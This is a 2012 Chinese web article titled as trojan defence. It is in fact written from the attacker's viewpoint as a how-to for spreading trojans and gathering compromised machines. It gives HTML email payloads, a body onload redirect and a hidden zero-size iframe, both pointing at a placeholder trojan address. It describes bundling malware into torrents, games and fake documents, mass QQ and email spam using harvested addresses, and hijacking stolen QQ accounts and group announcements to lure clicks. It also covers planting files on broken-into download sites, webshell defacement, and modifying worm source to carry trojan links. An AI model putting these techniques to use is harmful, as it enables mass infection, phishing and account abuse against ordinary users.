防木马：木马传播几种主流方式

发布时间：2012-10-02 21:44:14作者：知识屋

一.目前流行木马传播技术.
1.用BT制作木马种子
利用BT制作木马种子的教程网上也发布了很多,这里主要找一款具有诱惑性的软件然后捆绑上自己的木马,做成种子,最后发布出去.相信利用BT收集“肉鸡”速度非常快

2.利用PP共享自己捆了木马的软件或电影
方法同BT一样,要找诱惑性电影或软件,捆上自己的木马,然后共享自己的目录,这样人家就会通过搜索找到你的软件或电影.这里电影要配合网页木马.可以参看RealOnePlaye木马制作.在黑鹰可以找到.当你一打开我们的电影时就会打开我们制作过的网页木马.这样看电影也会中我们的木马

3.利用QQ邮箱传播木马
这里主要点HTML格式----在里面写上以下这段代码: <body onload="window.location='你的网页木马地址';"> </body>
当人家一打开你发过去的邮件时,就会中我们的木马

4.QQ群发网页木马　
首先，你要申请多个QQ号，然后找一款QQ消息群发器（各大黑客网站可以找到大量相关QQ群发信息软件，）再然后要加上非常具有诱惑性的消息（肉鸡的多与少与这个直接相关，）诱惑人家点点击你的网址，最后，在晚上时可以挂在电脑上群发带有网页木马的信息，相信只要你的信息够诱惑，肉鸡也是成群的

5.利用163邮箱传播网页木马
同样，这里用HTML格式，然后填上以下代码：</html><iframe src="你的网页木马地址" name="zhu" width="0" height="0"
frameborder="0"> 对方只要一打开，就会中我们的网页木马。这里发送邮件时注意一些技巧，我们要加入一些社会工程学，比如对方是爱好汽车、摄影的，你就在邮件标题上写上关于汽车、摄影的带目标、诱惑性标题，目的只有一个，让他点击我们捆绑网页木马邮件

6.利用邮箱群发我们的网页木马
这里要用到论坛邮箱提取器，这类工具各大黑客网站也有下载，大家可以找一下，提取大量邮箱后，配合foxmail这款邮件软件进行群发传播带有网页木马的邮件，这里也要注意技巧，比如在一个游戏论坛提取的邮箱，你就可以伪装本论坛发给广大游戏玩家,提供最新游戏外挂下载.然后写上自己的网页木马.大部分都认为信息的真实性而点击.从而中我们的木马. 这里还可以配合利用HTML格式群发我们的网页木马效果可更佳!

7.捆绑欺骗
这也是比较常用的传播木马技术.把木马捆绑在游戏、电影、主流软件上配合以上方法,QQ/E-mail/BT下载/BBS论坛等发布捆绑木马的软件.骗取点击我们软件,这样也就同时中了我们的木马

8.攻破下载点,捆上木马放入下载点.
当我们**到一些网站时,看看是否开放21服务,也就是是否提供FTP服务.若**到这类网站,恭喜你,你又可以得到大批量肉鸡.你可以捆上自己的木马然后放入下载点等待人家上钩吧，该方法获取肉鸡的速度也非常快.

9.钓鱼式欺骗别人点击你的网页木马或木马程序
钓鱼式欺骗攻击,也是国内最新发现的一种攻击手法.主要利用社会工程会中的信任关系骗他点击.具体的利用方法:当盗了人家的QQ号,你可以看看有几个群,然后在群里放上自己捆绑的木马.接着在群里发几条诱惑性的信息,比如最新申请6位QQ号软件, 由于是在同一个群,可能他们对该QQ号主人有一定的信任度,所以点击的可能性一定很大.若该QQ号主人是群主或是管理员,我们来个更毒的,干脆在公告上写上自己的网页木马地址,然后说本群刚建的专用网站，由于是群主,他们对他的信任度可想而知.应该都会点的吧!还有一招,在他QQ的个人资料上或个人签名上填上自己的网页木马,然后说刚建的个人网站.相信很多好友都会自动点击

10.网站主页挂马
这个应该不用具体介绍吧,网上很多教程.**到一个网站得到WEBSHELL后,接下来大家是不是都忙着找首页挂马了

11.论坛漏洞挂马
这里主要利用论坛的一些漏洞进行挂马,比如最近的动网前台提升管理员,然后挂马,动网的个人资料过虑不严挂马,还有投票挂马等等.利用这些漏洞进行挂马

12.文件类型伪装
这里主要把一些木马服务端和一些文本文件捆绑在一起,然后通后自解压方式或捆绑器制作成文本文件类型的可执行文件，对方以为打开一个文本文件时,虽然能正常运行文本文件,其实已经中了我们的木马.真是神不知鬼不觉。本人也做过文件类型欺骗的动画教程，.当然,还要以伪装成其它的类型,比如把木马制作成BMP图片.BAT格式等.只要他点击运行就会中我们的木马

13.其它的传播技术比如制作图片木马,也有专门的图片木马制作工具,RM木马制作网上各大网站也有相关教程,RealOnePlayer木马制作,FLASH木马制作.也有专门的制作工具, 网上可以找到相关工具.这些也是比较常用的传播技术.只要你有这方面的思路,都可以在网上找到相关资料,自己尝试制作.

二.常见主流木马传播技术
下面介绍几种比较常见主流木马传播技术.由于有一定的技术系数,所以隐蔽性比较强, 传播速度也快,而且也几乎不会被杀毒软件查杀

1.在WORD文档中加入木马文件
这种方法非常隐蔽,在WORD文档尾加入木马文件,只要别人点击这个所谓的WORD文件就会中木马,这种方法主要是通过把一个EXE格式的木马文件接在一个DOC文件的末尾,使别人察觉不到木马的存在,因此使之上当受骗.具体实现方法,比较复杂.本人也在进一步的研究之中.相信在不久这种方法就会流行起来

2.黑客工具绑木马
其实这本来算不上高级的方法,但最近发现很多黑客软件发布站,捆了木马的工具躲过管理员的检测.照样发布出来,想像危害性有多大.其实他们就是利用人性的弱点.黑客工具本来被杀毒软件查杀,捆了木马的工具被查杀就不觉得奇怪了.就会放松警惕.从而被他们利用.这一招是他们把黑客中的社会工程学利用的"恰到好处"

3.用Z-file伪装加密木马程序
z-file伪装加密软件是台湾华顺科技产品,其经过将文件压缩加密之后,再以bmp图像文件格式显示出来,扩展名是bmp,执行后是幅普通的图像.黑客会将木马程序和小游戏合拼,再用z-file加密及将此"混合体"发给受害者,由于看上去是图像文件,受害者往往不以为然,打开后又只是一般的图片,最可怕的地方还在于就连杀毒软件也检测不出它内藏木马

4.伪装成应用程序扩展组件
此类属于最难识别的特洛伊木马,也是骗术最高的木马,当然技术实现也有相当的难度, 由于涉及到编程,所以我这里只简单介绍原理,以供参考.采用内核插入式的嵌入方式,利用远程插入线程技术,嵌入DLL线程,或者挂接PSAPI,实现木马程序的隐藏.

5.通过QQ病毒,QQ蠕虫,QQ尾巴或邮箱病毒,蠕虫进行传播
相信利用这些技术进行传播木马的速度是最快的.这里要下载病毒,蠕虫源代码.进行分析.修改.加入我们的网页木马地址.然后传播到网上,这样就会一传十,十传百,指数级上升,自动为我们传播木马.这种传播速度是惊人的.网上也可找到相关QQ蠕虫制作器,菜鸟朋友就可以直接制作自己的带有网页木马的蠕虫了.以前的XX黑客就是利用QQ尾巴传播自己的木马,感染并操控了四万多台电脑.进行对XX的一家音乐网站进行分布式拒绝服务攻击（DDOS）.利用该技术攻击速度是最直接，最快的

（免责声明：文章内容如涉及作品内容、版权和其它问题，请及时与我们联系，我们将在第一时间删除内容，文章内容仅供参考）